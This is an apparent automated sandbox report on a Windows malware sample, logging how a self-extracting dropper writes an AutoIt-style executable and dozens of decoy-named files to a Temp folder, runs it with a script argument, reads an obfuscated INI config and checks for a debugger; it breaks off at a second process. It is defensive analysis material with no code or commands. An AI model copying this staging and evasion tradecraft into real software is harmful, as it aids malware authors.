| Write | fsk.exe | size = 2048 |
|
1 | |
| Write | fsk.exe | size = 27392 |
|
1 | |
| Write | fsk.exe | size = 41216 |
|
1 | |
| Write | fsk.exe | size = 14336 |
|
1 | |
| Write | fsk.exe | size = 34304 |
|
1 | |
| Write | fsk.exe | size = 83968 |
|
1 | |
| Write | fsk.exe | size = 30464 |
|
1 | |
| Write | fsk.exe | size = 7336 |
|
1 | |
| Write | rxi.mp3 | size = 573 |
|
1 | |
| Write | trh.txt | size = 555 |
|
1 | |
| Write | iqg.mp4 | size = 530 |
|
1 | |
| Write | vfn.docx | size = 623 |
|
1 | |
| Write | ggu.bmp | size = 538 |
|
1 | |
| Write | nit.pdf | size = 601 |
|
1 | |
| Write | gxt.docx | size = 514 |
|
1 | |
| Write | pvg.pdf | size = 510 |
|
1 | |
| Write | jwm.jpg | size = 516 |
|
1 | |
| Write | sst.ppt | size = 605 |
|
1 | |
| Write | unh.txt | size = 528 |
|
1 | |
| Write | khj.jpg | size = 536 |
|
1 | |
| Write | tre.bmp | size = 507 |
|
1 | |
| Write | lqw.docx | size = 558 |
|
1 | |
| Write | kcp.dat | size = 547 |
|
1 | |
| Write | trq.ico | size = 538 |
|
1 | |
| Write | vxa.docx | size = 605 |
|
1 | |
| Write | fpj.pdf | size = 510 |
|
1 | |
| Write | csn.mp4 | size = 610 |
|
1 | |
| Write | duw.pdf | size = 512 |
|
1 | |
| Write | abe.ppt | size = 556 |
|
1 | |
| Write | fbp.icm | size = 544 |
|
1 | |
| Write | xmj.docx | size = 523 |
|
1 | |
| Write | svl.mp3 | size = 662 |
|
1 | |
| Write | dbb.jpg | size = 588 |
|
1 | |
| Write | nbs.xl | size = 514 |
|
1 | |
| Write | mfj.pdf | size = 607 |
|
1 | |
| Write | mwq.xl | size = 505 |
|
1 | |
| Write | ten.jpg | size = 527 |
|
1 | |
| Write | nkp.xl | size = 518 |
|
1 | |
| Write | xkh.dat | size = 559 |
|
1 | |
| Write | grd.mp3 | size = 628 |
|
1 | |
| Write | upl.dat | size = 505 |
|
1 | |
| Write | evp.dat | size = 532 |
|
1 | |
| Write | ree.jpg | size = 505 |
|
1 | |
| Write | qms.xl | size = 520 |
|
1 | |
| Write | uvx.jpg | size = 607 |
|
1 | |
| Write | nil.pdf | size = 648 |
|
1 | |
| Write | nfp.bmp | size = 508 |
|
1 | |
| Write | lug.docx | size = 547 |
|
1 | |
| Write | plk.mp4 | size = 559 |
|
1 | |
| Write | huf.dat | size = 523 |
|
1 | |
| Write | alx.docx | size = 521 |
|
1 | |
| Write | fxw.dat | size = 573 |
|
1 | |
| Write | kcj.icm | size = 557 |
|
1 | |
| Write | vch.xl | size = 597 |
|
1 | |
| Write | chq.mp3 | size = 564 |
|
1 | |
| Write | lvi.bmp | size = 612 |
|
1 | |
| Delete | __tmp_rar_sfx_access_check_18129278 | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\aETAdzjz\AppData\Local\Temp\62890218\fsk.exe | show_window = SW_SHOWNORMAL |
|
1 |
Module (7)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | riched32.dll | base_address = 0x75280000 |
|
1 | |
| Load | riched20.dll | base_address = 0x74eb0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76540000 |
|
1 | |
| Get Handle | c:\users\aetadzjz\appdata\roaming\z79473a.exe | base_address = 0x400000 |
|
2 | |
| Get Filename | - | process_name = c:\users\aetadzjz\appdata\roaming\z79473a.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe, size = 1024 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDllDirectoryW, address_out = 0x765d004f |
|
1 |
Window (2)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Find | - | class_name = EDIT |
|
1 | |
| Set Attribute | - | index = 18446744073709551600, new_long = 1342341248 |
|
1 |
System (1890)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = Ticks, time = 128981 |
|
25 | |
| Get Time | type = Ticks, time = 129278 |
|
1 | |
| Get Time | type = System Time, time = 2019-02-11 09:18:36 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 129402 |
|
18 | |
| Get Time | type = Ticks, time = 129418 |
|
17 | |
| Get Time | type = Ticks, time = 129434 |
|
73 | |
| Get Time | type = Ticks, time = 129449 |
|
40 | |
| Get Time | type = Ticks, time = 129465 |
|
41 | |
| Get Time | type = Ticks, time = 129480 |
|
33 | |
| Get Time | type = Ticks, time = 129496 |
|
35 | |
| Get Time | type = Ticks, time = 129512 |
|
89 | |
| Get Time | type = Ticks, time = 129527 |
|
69 | |
| Get Time | type = Ticks, time = 129543 |
|
80 | |
| Get Time | type = Ticks, time = 129558 |
|
70 | |
| Get Time | type = Ticks, time = 129574 |
|
85 | |
| Get Time | type = Ticks, time = 129590 |
|
78 | |
| Get Time | type = Ticks, time = 129605 |
|
75 | |
| Get Time | type = Ticks, time = 129621 |
|
71 | |
| Get Time | type = Ticks, time = 129714 |
|
33 | |
| Get Time | type = Ticks, time = 129730 |
|
3 | |
| Get Time | type = Ticks, time = 129761 |
|
11 | |
| Get Time | type = Ticks, time = 129777 |
|
21 | |
| Get Time | type = Ticks, time = 129792 |
|
70 | |
| Get Time | type = Ticks, time = 129808 |
|
15 | |
| Get Time | type = Ticks, time = 129824 |
|
54 | |
| Get Time | type = Ticks, time = 129839 |
|
27 | |
| Get Time | type = Ticks, time = 129855 |
|
49 | |
| Get Time | type = Ticks, time = 129870 |
|
62 | |
| Get Time | type = Ticks, time = 129902 |
|
33 | |
| Get Time | type = Ticks, time = 129917 |
|
74 | |
| Get Time | type = Ticks, time = 129948 |
|
27 | |
| Get Time | type = Ticks, time = 129964 |
|
30 | |
| Get Time | type = Ticks, time = 129980 |
|
69 | |
| Get Time | type = Ticks, time = 129995 |
|
36 | |
| Get Time | type = Ticks, time = 130011 |
|
10 | |
| Get Time | type = Ticks, time = 130026 |
|
79 | |
| Get Time | type = Ticks, time = 130042 |
|
11 | |
| Get Time | type = Ticks, time = 130058 |
|
38 | |
| Get Time | type = Ticks, time = 130073 |
|
63 | |
| Get Time | type = Ticks, time = 130089 |
|
33 | |
| Get Time | type = Ticks, time = 130104 |
|
73 | |
| Get Time | type = Ticks, time = 130120 |
|
27 | |
| Get Time | type = Ticks, time = 130136 |
|
7 | |
| Get Time | type = Ticks, time = 130214 |
|
33 | |
| Get Info | type = Operating System |
|
1 |
Environment (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Set Environment String | name = sfxcmd, value = "C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe" |
|
1 | |
| Set Environment String | name = sfxname, value = C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe |
|
1 |
Process #7: fsk.exe
1342
0
| Information | Value |
|---|---|
| ID | #7 |
| File Name | c:\users\aetadzjz\appdata\local\temp\62890218\fsk.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Temp\62890218\fsk.exe" muu=ksm |
| Initial Working Directory | C:\Users\aETAdzjz\AppData\Local\Temp\62890218\ |
| Monitor | Start Time: 00:01:11, Reason: Child Process |
| Unmonitor | End Time: 00:01:19, Reason: Self Terminated |
| Monitor Duration | 00:00:08 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xbc0 |
| Parent PID | 0xba4 (c:\users\aetadzjz\appdata\roaming\z79473a.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BC4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00061fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x00070fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000080000 | 0x00080000 | 0x00081fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000090000 | 0x00090000 | 0x00097fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0011ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00120000 | 0x00186fff | Memory Mapped File | r |
|
|
|
- |
| muu=ksm | 0x00190000 | 0x001bdfff | Memory Mapped File | r |
|
|
|
- |
| muu=ksm | 0x00190000 | 0x001bdfff | Memory Mapped File | r |
|
|
|
|
| pagefile_0x0000000000190000 | 0x00190000 | 0x00197fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000270000 | 0x00270000 | 0x0034efff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x0037ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x007affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007e0000 | 0x007e0000 | 0x00bdffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000be0000 | 0x00be0000 | 0x00d67fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000d70000 | 0x00d70000 | 0x00ef0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000f00000 | 0x00f00000 | 0x00f7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f80000 | 0x00f80000 | 0x0108ffff | Private Memory | rw |
|
|
|
- |
| fsk.exe | 0x01140000 | 0x0121efff | Memory Mapped File | rwx |
|
|
|
|
| pagefile_0x0000000001220000 | 0x01220000 | 0x0261ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x02620000 | 0x028eefff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000028f0000 | 0x028f0000 | 0x02a7afff | Private Memory | rw |
|
|
|
- |
| private_0x00000000028f0000 | 0x028f0000 | 0x02a04fff | Private Memory | rw |
|
|
|
- |
| profapi.dll | 0x74cf0000 | 0x74cfafff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x74d00000 | 0x74d16fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x74d20000 | 0x74d26fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x74d30000 | 0x74d4bfff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74d50000 | 0x74eedfff | Memory Mapped File | rwx |
|
|
|
- |
| winmm.dll | 0x74ef0000 | 0x74f21fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x75050000 | 0x750cffff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x750d0000 | 0x7512bfff | Memory Mapped File | rwx |
|
|
|
- |
| mpr.dll | 0x75220000 | 0x75231fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75240000 | 0x7527efff | Memory Mapped File | rwx |
|
|
|
- |
| wsock32.dll | 0x75280000 | 0x75286fff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x75290000 | 0x752a2fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752d0000 | 0x752d7fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x752f0000 | 0x752f8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75310000 | 0x7531bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75320000 | 0x7537ffff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x75380000 | 0x75384fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75390000 | 0x7542ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75430000 | 0x754fbfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x75510000 | 0x75519fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x75540000 | 0x755cefff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x755d0000 | 0x7565ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75660000 | 0x756b6fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x756c0000 | 0x7573afff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x75740000 | 0x75875fff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x758b0000 | 0x758e4fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x758f0000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x759e0000 | 0x759ebfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759f0000 | 0x75a08fff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x75a10000 | 0x75b04fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75b60000 | 0x75bfcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75c00000 | 0x75cabfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75cb0000 | 0x75d0ffff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x75f10000 | 0x7610afff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x76110000 | 0x76155fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x76160000 | 0x762bbfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76380000 | 0x7647ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76540000 | 0x7664ffff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x76650000 | 0x7676cfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x76770000 | 0x773b9fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000773c0000 | 0x773c0000 | 0x774defff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000774e0000 | 0x774e0000 | 0x775d9fff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x77790000 | 0x77795fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x777c0000 | 0x7793ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00000000fffb0000 | 0xfffb0000 | 0xfffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000fffdb000 | 0xfffdb000 | 0xfffddfff | Private Memory | rw |
|
|
|
- |
| private_0x00000000fffde000 | 0xfffde000 | 0xfffdefff | Private Memory | rw |
|
|
|
- |
| private_0x00000000fffdf000 | 0xfffdf000 | 0xfffdffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000fffe0000 | 0xfffe0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (1222)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\aETAdzjz\AppData\Local\Temp\62890218\muu=ksm | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\aETAdzjz\AppData\Local\Temp\62890218\muu=ksm | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| Create | ddt.ico | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
122 | |
| Create | svq.mp3 | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
148 | |
| Create | C:\Users\aETAdzjz\AppData\Local\Temp\62890218\tqx.dat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Temp\62890218\muu=ksm | type = file_type |
|
2 | |
| Get Info | *.* | type = file_attributes |
|
1 | |
| Get Info | abe.ppt | type = file_attributes |
|
1 | |
| Get Info | alx.docx | type = file_attributes |
|
1 | |
| Get Info | chq.mp3 | type = file_attributes |
|
1 | |
| Get Info | csn.mp4 | type = file_attributes |
|
1 | |
| Get Info | dbb.jpg | type = file_attributes |
|
1 | |
| Get Info | ddt.ico | type = file_attributes |
|
1 | |
| Get Info | duw.pdf | type = file_attributes |
|
1 | |
| Get Info | evp.dat | type = file_attributes |
|
1 | |
| Get Info | fbp.icm | type = file_attributes |
|
1 | |
| Get Info | fpj.pdf | type = file_attributes |
|
1 | |
| Get Info | fsk.exe | type = file_attributes |
|
1 | |
| Get Info | fxw.dat | type = file_attributes |
|
1 | |
| Get Info | ggu.bmp | type = file_attributes |
|
1 | |
| Get Info | grd.mp3 | type = file_attributes |
|
1 | |
| Get Info | gxt.docx | type = file_attributes |
|
1 | |
| Get Info | huf.dat | type = file_attributes |
|
1 | |
| Get Info | iqg.mp4 | type = file_attributes |
|
1 | |
| Get Info | jwm.jpg | type = file_attributes |
|
1 | |
| Get Info | kcj.icm | type = file_attributes |
|
1 | |
| Get Info | kcp.dat | type = file_attributes |
|
1 | |
| Get Info | khj.jpg | type = file_attributes |
|
1 | |
| Get Info | lqw.docx | type = file_attributes |
|
1 | |
| Get Info | lug.docx | type = file_attributes |
|
1 | |
| Get Info | lvi.bmp | type = file_attributes |
|
1 | |
| Get Info | mfj.pdf | type = file_attributes |
|
1 | |
| Get Info | muu=ksm | type = file_attributes |
|
1 | |
| Get Info | mwq.xl | type = file_attributes |
|
1 | |
| Get Info | nbs.xl | type = file_attributes |
|
1 | |
| Get Info | nfp.bmp | type = file_attributes |
|
1 | |
| Get Info | nil.pdf | type = file_attributes |
|
1 | |
| Get Info | nit.pdf | type = file_attributes |
|
1 | |
| Get Info | nkp.xl | type = file_attributes |
|
1 | |
| Get Info | plk.mp4 | type = file_attributes |
|
1 | |
| Get Info | pvg.pdf | type = file_attributes |
|
1 | |
| Get Info | qms.xl | type = file_attributes |
|
1 | |
| Get Info | ree.jpg | type = file_attributes |
|
1 | |
| Get Info | rxi.mp3 | type = file_attributes |
|
1 | |
| Get Info | sst.ppt | type = file_attributes |
|
1 | |
| Get Info | svl.mp3 | type = file_attributes |
|
1 | |
| Get Info | svq.mp3 | type = file_attributes |
|
1 | |
| Get Info | ten.jpg | type = file_attributes |
|
1 | |
| Get Info | tqx.dat | type = file_attributes |
|
1 | |
| Get Info | tre.bmp | type = file_attributes |
|
1 | |
| Get Info | trh.txt | type = file_attributes |
|
1 | |
| Get Info | trq.ico | type = file_attributes |
|
1 | |
| Get Info | unh.txt | type = file_attributes |
|
1 | |
| Get Info | upl.dat | type = file_attributes |
|
1 | |
| Get Info | uvx.jpg | type = file_attributes |
|
1 | |
| Get Info | vch.xl | type = file_attributes |
|
1 | |
| Get Info | vfn.docx | type = file_attributes |
|
1 | |
| Get Info | vxa.docx | type = file_attributes |
|
1 | |
| Get Info | xkh.dat | type = file_attributes |
|
1 | |
| Get Info | xmj.docx | type = file_attributes |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Temp\62890218\muu=ksm | size = 65536, size_out = 65536 |
|
5 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Temp\62890218\muu=ksm | size = 65536, size_out = 54975 |
|
2 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Temp\62890218\muu=ksm | size = 8192, size_out = 0 |
|
2 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Temp\62890218\muu=ksm | size = 65536, size_out = 20 |
|
2 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Temp\62890218\muu=ksm | size = 61440, size_out = 0 |
|
2 | |
| Read | ddt.ico | size = 65536, size_out = 349 |
|
133 | |
| Read | ddt.ico | size = 65536, size_out = 0 |
|
271 | |
| Read | svq.mp3 | size = 65536, size_out = 356 |
|
148 | |
| Read | svq.mp3 | size = 65536, size_out = 0 |
|
296 | |
| Read | ddt.ico | size = 65536, size_out = 356 |
|
16 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Temp\62890218\tqx.dat | size = 65536, size_out = 65536 |
|
9 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Temp\62890218\tqx.dat | size = 65536, size_out = 42409 |
|
1 | |
| Read | - | size = 65536, size_out = 0 |
|
1 |
Registry (3)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Control Panel\Mouse | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\AutoIt v3\AutoIt | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Control Panel\Mouse | value_name = SwapMouseButtons, data = 48 |
|
1 |
Module (49)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x76540000 |
|
5 | |
| Load | C:\Users\aETAdzjz\AppData\Local\Temp\62890218\muu=ksm | base_address = 0x0 |
|
2 | |
| Load | user32.dll | base_address = 0x76380000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76540000 |
|
1 | |
| Get Filename | - | process_name = c:\users\aetadzjz\appdata\local\temp\62890218\fsk.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Temp\62890218\fsk.exe, size = 260 |
|
1 | |
| Get Filename | - | process_name = c:\users\aetadzjz\appdata\local\temp\62890218\fsk.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Temp\62890218\fsk.exe, size = 32767 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x76554f2b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7655359f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x76551252 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x76554208 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x76554d28 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x765d410b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x765d4195 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7655d31f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7656ee7e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x7780441c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x7782c50e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x7782c381 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x7656f088 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x778105d7 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x7782ca24 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x777e0b8c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x7789fde8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77831e1d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x765d4761 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x765ccd11 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x765d424f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x765d46b1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x765e6676 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x765d4751 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x765e65f1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x765d47c1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x765d47e1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x765d47f1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x7656eee0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetNativeSystemInfo, address_out = 0x765610b5 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | address_out = 0x7656d650 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | address_out = 0x7656d668 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Wow64DisableWow64FsRedirection, address_out = 0x7656d650 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Wow64RevertWow64FsRedirection, address_out = 0x7656d668 |
|
1 |
Window (2)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | AutoIt v3 | class_name = AutoIt v3, wndproc_parameter = 0 |
|
1 | |
| Create | - | class_name = edit, wndproc_parameter = 0 |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 750 milliseconds (0.750 seconds) |
|
1 | |
| Get Time | type = System Time, time = 2019-02-11 09:18:38 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2019-02-11 09:18:44 (UTC) |
|
1 | |
| Get Info | type = Operating System |
|
1 | |
| Get Info | type = Hardware Information |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Ini (3)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Read | C:\Users\aETAdzjz\AppData\Local\Temp\62890218\tqx.dat | section_name = S3tting, key_name = Dir3ctory, data_out = 62890218 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Temp\62890218\tqx.dat | section_name = S3tting, key_name = sK, data_out = 746 |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Temp\62890218\tqx.dat | section_name = S3tting, key_name = sN, data_out = mdn.ndp |
|
1 |
Debug (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Check for Presence | c:\users\aetadzjz\appdata\local\temp\62890218\fsk.exe | - |
|
1 |
Process #8: fsk.exe
120
0
| Information | Value |
|---|---|
| ID | #8 |
